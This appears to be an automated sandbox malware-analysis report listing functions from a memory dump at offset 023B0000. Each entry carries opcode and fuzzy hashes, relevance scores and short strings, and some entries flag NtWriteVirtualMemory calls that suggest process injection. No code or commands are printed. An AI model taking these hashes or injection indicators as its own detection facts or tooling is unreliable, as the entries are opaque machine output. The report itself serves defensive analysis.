Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: cf578b69ac11dfdc99723c76aa3b02a7f6bce930c3154af4d7641f456717f1a1
Instruction ID: 87172ea8d22dcc071852a7ba79b278efeb81225de38a261e05c8cbf426f28f6f
Opcode Fuzzy Hash: cf578b69ac11dfdc99723c76aa3b02a7f6bce930c3154af4d7641f456717f1a1
Instruction Fuzzy Hash: 1802FBB6604288DFDF76CF28CD457EA7BB6FF98310F41802ADD499B624D7709A818B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6479, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 3224bfd42e4addc6a7051ea82a5c92f6e5c419fdbefd77d57f9b514e1003a9ae
Instruction ID: 4efdb8871c3dac912794c28f78de4fafa7529a50febeeab7b110f1683a59bec9
Opcode Fuzzy Hash: 3224bfd42e4addc6a7051ea82a5c92f6e5c419fdbefd77d57f9b514e1003a9ae
Instruction Fuzzy Hash: 7A02FBB6604288DFDF76CF38CD457DA3BA6FF98310F41802ADD499B624D7709A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6485, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 406COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: b3c51446cc2cc6315759d5daf7f939defb1bf0b00893168ba2128b4b23df11f7
Instruction ID: 5df4c3634d78e43b3a096a3327ea156eec210e2b06c7ad59f11e66c38cc13603
Opcode Fuzzy Hash: b3c51446cc2cc6315759d5daf7f939defb1bf0b00893168ba2128b4b23df11f7
Instruction Fuzzy Hash: 3902EAB6604288DFDF76CF38CD457EA3BA6FF98310F41802ADD499B624D7709A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B64A9, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 40f070a54270ba6362602e2b69b1d8c456ec6bb8e0ca55720d364bd2b217d868
Instruction ID: 84a36534a9276bb091decafc99760c40ddcada353eda5f29ee4738c9914041c5
Opcode Fuzzy Hash: 40f070a54270ba6362602e2b69b1d8c456ec6bb8e0ca55720d364bd2b217d868
Instruction Fuzzy Hash: 8202EAB6604288DFDF768F38CD457DA3BB6FF98310F41802ADD499B624D7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B65D5, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 359COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 8a0682b002546e5b763791ae0117a108aed5619b127d92e515f586d6e9fda9ec
Instruction ID: 1579006d54f96003b307ad52a855b7ad777ef297b6152ed627ee8dc420c8d05b
Opcode Fuzzy Hash: 8a0682b002546e5b763791ae0117a108aed5619b127d92e515f586d6e9fda9ec
Instruction Fuzzy Hash: 86F1FBB6604288DFDF768F38CD467EA3BB6FF58310F45802ADD499B624C7709A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B65E1, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 356COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: b302511b5a1241f450dca2011dc9d5a99317a416150ce2ae90d67241a83a9238
Instruction ID: ec84ed63086408dceaa3befad2f6e14d21b3c1c2bd7631bab0a3dde5c95dce81
Opcode Fuzzy Hash: b302511b5a1241f450dca2011dc9d5a99317a416150ce2ae90d67241a83a9238
Instruction Fuzzy Hash: F5F1FBB6604288DFDF768F38CD467EA3BB6FF58310F45802ADD499B624C7709A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B65B1, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 351COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 3504a124fec5974f277a650ef45a502da9f48400f9e0bed2dda47f82c424aaa3
Instruction ID: 0eea901ab61f9995d7fca6c9d3fb28288792559de9941128df4f821ecdf5ad7d
Opcode Fuzzy Hash: 3504a124fec5974f277a650ef45a502da9f48400f9e0bed2dda47f82c424aaa3
Instruction Fuzzy Hash: D6F1FBB6604288DFDF758F38CD467EA3BB6FF58310F45802ADD899B624C7709A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B65BD, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: dbdc123c091f834a349928eb1022ca1f1b15ea8fad29267b0b7a4bad365b951f
Instruction ID: 2ac0dd707d206e4d1f15cabbf44ab71d13483dfa75acdc141f286a17526c7660
Opcode Fuzzy Hash: dbdc123c091f834a349928eb1022ca1f1b15ea8fad29267b0b7a4bad365b951f
Instruction Fuzzy Hash: D1F1FAB6604288DFDF758F38CD467EA3BB6FF58310F45802ADD899B624C7709A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B65C9, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 347COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 08e037390c97cc1a4df3fee5d288fc4e49cf2f9deb09d5999a5d194b00d76893
Instruction ID: 421e4d0effad29d4a2e2b98dc81224c167ccc2be57066902a43bc90dc27dfbd0
Opcode Fuzzy Hash: 08e037390c97cc1a4df3fee5d288fc4e49cf2f9deb09d5999a5d194b00d76893
Instruction Fuzzy Hash: 8AF1FAB6604288DFDF758F38CD467EA3BB6FF58300F45802ADD899B624C7709A858B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6769, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 63a4221ce054f85cad342d21608e3f586affd04ec21b56deda0a53e742197ff1
Instruction ID: b8ce56b14cc2fd639fc7fa15036dad3e81fa96dc28474c183953b122b0232601
Opcode Fuzzy Hash: 63a4221ce054f85cad342d21608e3f586affd04ec21b56deda0a53e742197ff1
Instruction Fuzzy Hash: F0D1EBB6600298CFDF768F38CD467DA3BB6FF59310F45402ADE499B621C7719A818B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B673B, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 3f6f47d4da4e401e09b9f1d0e429c6a53efb15794d3c81475eff318d5e86ba66
Instruction ID: 351d040dff5126a9161e8170857a42da46defda92d0153c8ef4f1ece782eb37f
Opcode Fuzzy Hash: 3f6f47d4da4e401e09b9f1d0e429c6a53efb15794d3c81475eff318d5e86ba66
Instruction Fuzzy Hash: D0D1D9B6600298DFDF768F38CD467DA3BB6FF58310F45402ADE499B621C7719A818B81

Uniqueness

Uniqueness Score: -1.00%

Function 023B6745, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 592000fc31745fe3218a7c14104c1ec295afe8c88f6a6d4b282655b045b81d44
Instruction ID: bd7f0882823831defa1a251b571f7799cc978e4f8cae157b3bbb2db4501404db
Opcode Fuzzy Hash: 592000fc31745fe3218a7c14104c1ec295afe8c88f6a6d4b282655b045b81d44
Instruction Fuzzy Hash: 60D1E8B6600298DFDF768F38CD467DA3BB6FF58310F45402ADE499B621C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6751, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: b6ce8e10ea538518bad2cefb6e37ede966a27df42b98660a6283370f06e79591
Instruction ID: c9332d3cb9418d5b39b61c007017fd9691a4d61dbb0f39ae9270c40b65d934fb
Opcode Fuzzy Hash: b6ce8e10ea538518bad2cefb6e37ede966a27df42b98660a6283370f06e79591
Instruction Fuzzy Hash: 7DD1E9B6600298DFDF768F28CD467DA3BB6FF58310F45402ADE499B621C7719B828B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B675D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 288COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: d6ae10dc09713de413c4be9418f53c367d904e5edf30976fb679d8ca93d8df8d
Instruction ID: 19bcebdb482769b4ce4addfa920df555182ac934bd5071657c9680218c8f2cb5
Opcode Fuzzy Hash: d6ae10dc09713de413c4be9418f53c367d904e5edf30976fb679d8ca93d8df8d
Instruction Fuzzy Hash: 5BD1FAB6600298DFDF768F28CD467DA3BB6FF58310F45402ADE499B621C7719B828B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6829, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 8245c8c85c46a16dfc259653d0dcf4ebec9102e3a6b9b54b144e2a802c7232c7
Instruction ID: 9b4591d494e54b4d6d40afdf12d79d905b36469835d592e049a106b87e0be736
Opcode Fuzzy Hash: 8245c8c85c46a16dfc259653d0dcf4ebec9102e3a6b9b54b144e2a802c7232c7
Instruction Fuzzy Hash: D0C1D9B6600298DFDF768F28CC467DA3BB6FF59310F45802ADE499B621C7719A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6835, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 270COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 7ee15760cf4b8b6c859af356510317e66fc76753f7d588bd19215ce14d2a406f
Instruction ID: 8db5bc10524495177c523d243a5e8c794be895065042f05f06106160c264a75a
Opcode Fuzzy Hash: 7ee15760cf4b8b6c859af356510317e66fc76753f7d588bd19215ce14d2a406f
Instruction Fuzzy Hash: 59C1D8B2600298DFDF768F28CC467DA3BB6FF59310F45802ADE499B621C7719A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6841, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: ccb6beb90bfd5bf6de09271b09b458ae8f018c25dd1b1a8c33e890af75f88505
Instruction ID: 1919a7e2f61a3bc7a447a7ad4465e5ecb5d163fff299c6b267edd88d9f3c64ab
Opcode Fuzzy Hash: ccb6beb90bfd5bf6de09271b09b458ae8f018c25dd1b1a8c33e890af75f88505
Instruction Fuzzy Hash: 7BC1D8B2600288DFDF768F28CC467DA3BB6FF59310F45802ADE499B661C7719A85CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6805, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 264COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 50e535767edf5607c9c254674256f558b6d239ff0a575f5a425584755bdae801
Instruction ID: ed7729360a4b2978abe70c772aeb1d6393a6a1a2555d683abcd9defb0928c55f
Opcode Fuzzy Hash: 50e535767edf5607c9c254674256f558b6d239ff0a575f5a425584755bdae801
Instruction Fuzzy Hash: 3EC1D9B2600288DFDF768F28CD467DA3BB6FF59310F45802ADE499B621C7719A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B681D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 4a1d511e3094e386e5715ab8edd5643e6bde71ac5a75b96e72de2d4c41589e27
Instruction ID: 6d98f534e9b399c6f3d9e920e42a8e442bbf29292ba61d3ff880b6279e684450
Opcode Fuzzy Hash: 4a1d511e3094e386e5715ab8edd5643e6bde71ac5a75b96e72de2d4c41589e27
Instruction Fuzzy Hash: B1C1C976600298DFDF768F28CD467DA3BB6FF58310F45802ADE499B621C7719B818B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B684C, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 252nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: 819988d0391cdca53990f450a08c87adfb9b22b4c5d2ef9061f2bc0ae8dc1756
Instruction ID: 044384b4d5c298aaae4d0460e364c7b15a7158920927139467d5b589a6cecee7
Opcode Fuzzy Hash: 819988d0391cdca53990f450a08c87adfb9b22b4c5d2ef9061f2bc0ae8dc1756
Instruction Fuzzy Hash: 08C1C972600288DFDF768F28CD867DA3BA6FF59300F448029DE499B621C7719B828B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6941, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: c00ee37ddc1e9e1c844d6d469829ee6a6fc179955ac0848b8046a8450c4399b3
Instruction ID: a1f19b44d31f74ed68d1d15d1d52eeed47c9f14589e5d99cc4d1a9955ad10739
Opcode Fuzzy Hash: c00ee37ddc1e9e1c844d6d469829ee6a6fc179955ac0848b8046a8450c4399b3
Instruction Fuzzy Hash: ADA1A676200288DFDF768F24CD867DA3BB6FF98310F548129DE499B621C7719B868B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B694D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: c8f310a8804888e4010d632dfca3d1edd32f677f8b6f29ac8b0ea5dc5c849cda
Instruction ID: b636aee6550b3ef9f30017aec09fa459b8900a7604848c11db5b377ab25c529c
Opcode Fuzzy Hash: c8f310a8804888e4010d632dfca3d1edd32f677f8b6f29ac8b0ea5dc5c849cda
Instruction Fuzzy Hash: CAA1B776200288DFDF768F28CD467DA7BB6FF98310F448029DE499A625C7719B868B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6929, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 217COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 30c905cbf8b04e7f3eda589c58b2efd82f98ee7f29123a42cc697462e5349662
Instruction ID: 2263c972259eacd2a8af64cad74b46a126ad2ec96b6d6e3c7e8bdd924e3085bd
Opcode Fuzzy Hash: 30c905cbf8b04e7f3eda589c58b2efd82f98ee7f29123a42cc697462e5349662
Instruction Fuzzy Hash: 57A1B876200288DFDF768F24CD467DA7BB6FF98310F448029DE499B625C7719B868B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6935, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 67a825fd3e390bdb714efd59dbcd186052b4db6e57110fbb99f2fc6330074787
Instruction ID: f96d4f0d85b0dc9ba664ffc8f8b34b073d731ffbc1ee7841c5d2ce2b047c17d9
Opcode Fuzzy Hash: 67a825fd3e390bdb714efd59dbcd186052b4db6e57110fbb99f2fc6330074787
Instruction Fuzzy Hash: 37A1B876200288DFDF768F24CD467DA7BB6FF98310F408029DE499A625C7719B868B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6959, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: c54539b9c8ffc482cbd8d3591c6f61f87758a4bf1c96086cf3782f2406848caf
Instruction ID: 4e569654e45582601c0be7a1818fca334c02e436018eab530ce0eb79b003a376
Opcode Fuzzy Hash: c54539b9c8ffc482cbd8d3591c6f61f87758a4bf1c96086cf3782f2406848caf
Instruction Fuzzy Hash: C2A1B876200288DFDF76CF24CD867DA7BB2FF98310F408029DE499A625C7719B868B41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6A8D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: e8ce822aef3c91ae92e529e06c0889b43821476737112c9895d255d3b938d879
Instruction ID: e0a7da7baaef88df3d9276c12c98c4541747d3552adef6bb712f22c935e5e1f8
Opcode Fuzzy Hash: e8ce822aef3c91ae92e529e06c0889b43821476737112c9895d255d3b938d879
Instruction Fuzzy Hash: CF81D9B6600288CFDF769F28CD457DA7BA6FF98310F448029DE889B611C7759A82CF41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6A99, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 5769aa4fcaa6096f564398e2bdfa66ff6dc37c2df7f986dcb5f8812ed37b2de0
Instruction ID: c8961b7e44e24841c9922b3e036a6b86335452000109c10107b31a9abf6c2b6d
Opcode Fuzzy Hash: 5769aa4fcaa6096f564398e2bdfa66ff6dc37c2df7f986dcb5f8812ed37b2de0
Instruction Fuzzy Hash: 9681D976204288CFDF768F28CD457DA7BA6FF98310F458029DE889B611C775AA82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6AA5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: 3b62f6debda985b8590d1136a0c1c5c2a725bffd97c76a72e26bc8ad0b2c8716
Instruction ID: 866002afae15b3251433cc7e507b70f54c5a7af4b9a3ed515d9782f7adea1128
Opcode Fuzzy Hash: 3b62f6debda985b8590d1136a0c1c5c2a725bffd97c76a72e26bc8ad0b2c8716
Instruction Fuzzy Hash: 2381D976204388DFDF768F28CD457DA7BA6FF98300F418029DE899B611C775AA82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6A5D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: da2bb060eefcfbf3dae4ab6cab25ebb97fa179c460b8ff118f4f2e2ea10c9c28
Instruction ID: de626f49f64a59d91e5ff7fb3822b25056a56dad0f3fa6c610aed091638740a3
Opcode Fuzzy Hash: da2bb060eefcfbf3dae4ab6cab25ebb97fa179c460b8ff118f4f2e2ea10c9c28
Instruction Fuzzy Hash: 0E71DA76204288DFDF769F28CD457DA7BA6FF98300F418029DE889B621C7719A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6A69, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: f5e2c3b4b98dafaad8de276734f6e59f546cea3b88e897e1430fd104b163ebde
Instruction ID: eae0be0f9e1604b39ddb836de54a5015039f105b963066316f83efc1425d3d96
Opcode Fuzzy Hash: f5e2c3b4b98dafaad8de276734f6e59f546cea3b88e897e1430fd104b163ebde
Instruction Fuzzy Hash: 2371D976204288CFDF769F38CD457DA7BA6FF98300F418029DE889B621C7719A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6A75, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: be61e21ed421136bed445106cfa7bc29ba2928df078fa7c7b47c13135b2fbf4e
Instruction ID: cd7018885955791c1eb94e14fac6c83fa30a65436949bda4eba98f062e2684d4
Opcode Fuzzy Hash: be61e21ed421136bed445106cfa7bc29ba2928df078fa7c7b47c13135b2fbf4e
Instruction Fuzzy Hash: 5671D976204288CFDF769F38CD457DA7BA6FF98300F418029DE889B621C7719A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B6BF5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 45fbc40264878c9dc7928f71aee348b8627b0e4a21dcb26541a52f877c3e297e
Instruction ID: 8009a2ec81210dea18dd7ceaf6ca1b2db7f81eca72cd5441a81831fee03ae97a
Opcode Fuzzy Hash: 45fbc40264878c9dc7928f71aee348b8627b0e4a21dcb26541a52f877c3e297e
Instruction Fuzzy Hash: 6451A875200288DFDF7A8F28CD417DA3BB6FF98310F144029DE499A621C7729A92CF44

Uniqueness

Uniqueness Score: -1.00%

Function 023B6BD1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: 5a251f7ad6fbd7f626d36cf9570773d3dec4f35524726da7cd4b6a9916a43c05
Instruction ID: 45d87654c53bd83890ed73a02dffd933189349a53e423829b9cd99982f4f98cf
Opcode Fuzzy Hash: 5a251f7ad6fbd7f626d36cf9570773d3dec4f35524726da7cd4b6a9916a43c05
Instruction Fuzzy Hash: EE519776604298DFDF7A8F28CD41BDA7BB6FF98300F144029EE499B621C7759A42CB44

Uniqueness

Uniqueness Score: -1.00%

Function 023B6BDD, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: 9c4d5e43c882dd79a1adb8a80fd34f45629f341f166f7f4933ae0d3247e1dac4
Instruction ID: f4c63852f63e239794ac94044f030dfadb00b240eaf6417f074bc291e121d081
